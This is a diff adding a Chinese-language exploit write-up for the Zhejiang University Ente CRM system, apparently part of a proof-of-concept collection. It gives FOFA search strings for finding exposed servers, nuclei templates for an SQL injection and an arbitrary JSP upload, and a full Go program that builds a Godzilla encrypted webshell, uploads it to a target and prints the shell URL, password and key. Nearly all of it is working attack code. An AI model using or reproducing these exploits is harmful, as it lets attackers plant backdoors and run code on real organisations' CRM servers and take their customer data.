diff --git a/浙大恩特客户资源管理系统 文件上传和sql注入漏洞.md b/浙大恩特客户资源管理系统 文件上传和sql注入漏洞.md new file mode 100644 index 0000000..0d0ea4a --- /dev/null +++ b/浙大恩特客户资源管理系统 文件上传和sql注入漏洞.md @@ -0,0 +1,203 @@ +## 浙大恩特客户资源管理系统 文件上传和sql注入漏洞 + +## 特征 +``` +app.name="浙大恩特 CRM" +app="浙大恩特客户资源管理系统" +``` + +## SQL注入 +```yaml +id: enter-T0140_editAction-api-sqli + +info: + name: 浙大恩特客户资源管理系统T0140_editAction.entweb;.js接口sql注入漏洞 + author: YGnight + severity: high + description: description + reference: + - https:// + metadata: + verified: true + max-request: 1 + fofa-query: app="浙大恩特客户资源管理系统" + + +requests: + - raw: + - |+ + GET /entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1 HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + Accept-Encoding: gzip, deflate, br + Connection: close + Cookie: JSESSIONID=1DAEEF5E703FF40871BD44A67C1EEDD5; JSESSIONID=2C6DAAA80F315B114CD65C9DA80D8D8C + Upgrade-Insecure-Requests: 1 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '0' + +``` + +## 文件上传1 +```yaml +id: enter-machord_doc-api-fileupload + +info: + name: 浙大恩特客户资源管理系统machord_doc.jsp;.js接口任意文件上传 + author: YGnight + severity: high + description: description + reference: + - https:// + metadata: + verified: true + max-request: 1 + fofa-query: app="浙大恩特客户资源管理系统" + + +requests: + - raw: + - |- + POST /entsoft_en/Storage/machord_doc.jsp;.js?formID=upload&machordernum=&fileName=night.jsp&strAffixStr=&oprfilenam=null&gesnum= HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0 uacq + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + Accept-Encoding: gzip, deflate + Connection: close + Content-Type: multipart/form-data; boundary=----4225820000370152680749129212 + Content-Length: 548 + + ------4225820000370152680749129212 + Content-Disposition: form-data; name="oprfilenam" + + null + ------4225820000370152680749129212 + Content-Disposition: form-data; name="uploadflg" + + 0 + ------4225820000370152680749129212 + Content-Disposition: form-data; name="strAffixStr" + + + ------4225820000370152680749129212 + Content-Disposition: form-data; name="selfilenam" + + + ------4225820000370152680749129212 + Content-Disposition: form-data; name="uploadfile"; filename="night.jsp" + Content-Type: image/png + + night + ------4225820000370152680749129212-- + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'night.jsp' +``` + +## 文件上传2 +```go +package main + +import ( + "bytes" + "crypto/md5" + "crypto/tls" + "encoding/json" + "fmt" + "github.com/hpifu/go-kit/hflag" + "github.com/liushuochen/gotable" + "github.com/thanhpk/randstr" + "io/ioutil" + "mime/multipart" + "net/http" + "os" + "strings" + "time" +) + +type Resutl struct { + VisitRoot string `json:"visitRoot"` + FileName string `json:"fileName"` + Path string `json:"path"` + IsImage bool `json:"isImage"` + Msg string `json:"msg"` +} + +func main() { + context, password, key := initGodZillaShell() + str := gethost() + s := exploit(str, context) + shellURL := strings.Replace(str+s, "//ent", "/ent", 1) + tb, _ := gotable.Create("ShellURL", "ShellPass", "ShellKey") + _ = tb.AddRow([]string{ + shellURL, password, key, + }) + fmt.Println(tb) +} + +func initGodZillaShell() (shellContext, shellPassword, shellKey string) { + password := randstr.Hex(12) + safeKey := randstr.Hex(6) + md5Key := fmt.Sprintf("%x", md5.Sum([]byte(safeKey)))[0:16] + shellContent := "<%! String xc=\"" + md5Key + "\"; String pass=\"" + password + "\"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance(\"AES\");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),\"AES\"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance(\"MD5\");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName(\"java.util.Base64\");Object Encoder = base64.getMethod(\"getEncoder\", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod(\"encodeToString\", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName(\"sun.misc.BASE64Encoder\"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod(\"encode\", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName(\"java.util.Base64\");Object decoder = base64.getMethod(\"getDecoder\", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod(\"decode\", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName(\"sun.misc.BASE64Decoder\"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod(\"decodeBuffer\", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute(\"payload\")==null){session.setAttribute(\"payload\",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute(\"parameters\",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute(\"payload\")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}\n%>" + return shellContent, password, safeKey +} + +func gethost() string { + hflag.AddFlag("target", "浙大恩特地址", hflag.Required(), hflag.Shorthand("t")) + if err := hflag.Parse(); err != nil { + fmt.Println(hflag.Usage()) + os.Exit(0) + } + return hflag.GetString("target") +} +func cli() *http.Client { + c := &http.Client{Transport: &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}} + c.Timeout = time.Second * 15 + return c +} + +func exploit(t, s string) string { + client := cli() + buffer := &bytes.Buffer{} + writer := multipart.NewWriter(buffer) + filename := randstr.Hex(8) + ".jsp" + _, _ = writer.CreateFormFile("file", filename) + _, _ = buffer.WriteString(s) + _ = writer.Close() + target := strings.Replace(t+"/entsoft/MailAction.entphone;.js?act=saveAttaFile", "//en", "/en", 1) + request, _ := http.NewRequest(http.MethodPost, target, strings.NewReader(buffer.String())) + request.Header.Set("Content-Type", writer.FormDataContentType()) + request.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36") + do, _ := client.Do(request) + defer func() { + _ = do.Body.Close() + }() + all, _ := ioutil.ReadAll(do.Body) + var result Resutl + _ = json.Unmarshal(all, &result) + if result.Msg != "上传成功" { + fmt.Println("上传失败了") + os.Exit(0) + } + split := strings.Split(result.VisitRoot, "null") + return split[1] +} + +```